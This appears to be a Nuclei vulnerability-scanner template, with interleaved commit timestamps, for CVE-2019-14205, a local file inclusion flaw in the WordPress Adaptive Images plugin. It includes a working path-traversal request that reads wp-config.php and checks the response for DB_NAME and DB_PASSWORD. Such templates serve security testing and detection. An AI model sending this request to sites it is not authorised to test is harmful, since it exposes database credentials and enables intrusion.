2021-02-18 01:22:37 +00:00
id : CVE-2019-14205
2022-04-22 10:38:41 +00:00
2021-02-18 01:22:37 +00:00
info :
2022-06-14 15:14:14 +00:00
name : WordPress Nevma Adaptive Images <0.6.67 - Local File Inclusion
2021-02-18 01:22:37 +00:00
author : pikpikcu
severity : high
2022-06-20 17:30:55 +00:00
description : |
WordPress Nevma Adaptive Images plugin before 0.6.67 allows remote attackers to retrieve arbitrary files via the $REQUEST['adaptive-images-settings']['source_file'] parameter in adaptive-images-script.php.
2022-04-22 10:38:41 +00:00
reference :
- https://github.com/security-kma/EXPLOITING-CVE-2019-14205
2022-05-17 09:18:12 +00:00
- https://markgruffer.github.io/2019/07/19/adaptive-images-for-wordpress-0-6-66-lfi-rce-file-deletion.html
- https://wordpress.org/plugins/adaptive-images/#developers
- https://github.com/markgruffer/markgruffer.github.io/blob/master/_posts/2019-07-19-adaptive-images-for-wordpress-0-6-66-lfi-rce-file-deletion.markdown
2022-06-14 15:14:14 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2019-14205
2021-09-10 11:26:40 +00:00
classification :
2022-05-17 09:18:12 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 7.5
2021-09-10 11:26:40 +00:00
cve-id : CVE-2019-14205
cwe-id : CWE-22
2023-07-11 19:49:27 +00:00
epss-score : 0.06333
cpe : cpe:2.3:a:nevma:adaptive_images:*:*:*:*:*:wordpress:*:*
2023-08-31 11:46:18 +00:00
epss-percentile : 0.92717
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-07-11 19:49:27 +00:00
framework : wordpress
vendor : nevma
product : adaptive_images
tags : cve,cve2019,wordpress,wp-plugin,lfi,wp
2021-02-18 01:22:37 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-02-18 01:22:37 +00:00
- method : GET
path :
- '{{BaseURL}}/wp-content/plugins/adaptive-images/adaptive-images-script.php?adaptive-images-settings[source_file]=../../../wp-config.php'
matchers-condition : and
matchers :
- type : word
2022-06-20 17:30:55 +00:00
part : body
2021-02-18 01:22:37 +00:00
words :
- "DB_NAME"
- "DB_PASSWORD"
2021-02-18 05:39:07 +00:00
condition : and
2022-06-20 17:30:55 +00:00
2021-02-18 01:22:37 +00:00
- type : status
status :
- 200